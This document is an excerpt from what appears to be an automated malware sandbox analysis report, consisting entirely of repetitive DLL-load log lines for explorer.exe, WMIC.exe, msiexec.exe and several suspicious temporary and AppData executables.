                Source: C:\Windows\explorer.exeSection loaded: taskschd.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: webio.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: mfsrcsnk.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\haevsidSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\haevsidSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\haevsidSection loaded: msimg32.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\haevsidSection loaded: msvcr100.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38E5.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38E5.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38E5.exeSection loaded: msimg32.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38E5.exeSection loaded: msvcr100.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\uievsidSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\uievsidSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\uievsidSection loaded: msimg32.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\uievsidSection loaded: msvcr100.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\BC8F.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\BC8F.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\BC8F.exeSection loaded: winscard.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\BC8F.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\BC8F.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\BC8F.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\BC8F.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\BC8F.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\BC8F.exeSection loaded: devobj.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\BC8F.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\BC8F.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\BC8F.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\BC8F.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\BC8F.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\BC8F.exeSection loaded: cryptnet.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\BC8F.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\BC8F.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\BC8F.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\BC8F.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\BC8F.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\BC8F.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\BC8F.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\BC8F.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\BC8F.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: aepic.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dxgi.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wtsapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dwmapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: umpdc.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: webio.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: aepic.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: twinapi.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: dxgi.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wtsapi32.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: dwmapi.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: twinapi.appcore.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: umpdc.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: aepic.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dxgi.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wtsapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dwmapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: umpdc.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: aepic.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: twinapi.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: dxgi.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wtsapi32.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: dwmapi.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: twinapi.appcore.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: umpdc.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: aepic.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dxgi.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wtsapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dwmapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: umpdc.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: aepic.dll
                Source: C:\Windows\explorer.exeSection loaded: twinapi.dll
                Source: C:\Windows\explorer.exeSection loaded: userenv.dll
                Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dll
                Source: C:\Windows\explorer.exeSection loaded: powrprof.dll
                Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
                Source: C:\Windows\explorer.exeSection loaded: dxgi.dll
                Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
                Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\explorer.exeSection loaded: propsys.dll
                Source: C:\Windows\explorer.exeSection loaded: coremessaging.dll
                Source: C:\Windows\explorer.exeSection loaded: urlmon.dll
                Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
                Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
                Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\explorer.exeSection loaded: wtsapi32.dll
                Source: C:\Windows\explorer.exeSection loaded: wininet.dll
                Source: C:\Windows\explorer.exeSection loaded: uxtheme.dll
                Source: C:\Windows\explorer.exeSection loaded: dwmapi.dll
                Source: C:\Windows\explorer.exeSection loaded: sspicli.dll
                Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\explorer.exeSection loaded: twinapi.appcore.dll
                Source: C:\Windows\explorer.exeSection loaded: ntmarta.dll
                Source: C:\Windows\explorer.exeSection loaded: cryptsp.dll
                Source: C:\Windows\explorer.exeSection loaded: wldp.dll
                Source: C:\Windows\explorer.exeSection loaded: iertutil.dll
                Source: C:\Windows\explorer.exeSection loaded: srvcli.dll
                Source: C:\Windows\explorer.exeSection loaded: netutils.dll
                Source: C:\Windows\explorer.exeSection loaded: umpdc.dll
                Source: C:\Windows\explorer.exeSection loaded: dnsapi.dll
                Source: C:\Windows\explorer.exeSection loaded: winhttp.dll
                Source: C:\Windows\System32\cmd.exeSection loaded: winbrand.dll
                Source: C:\Windows\System32\cmd.exeSection loaded: wldp.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
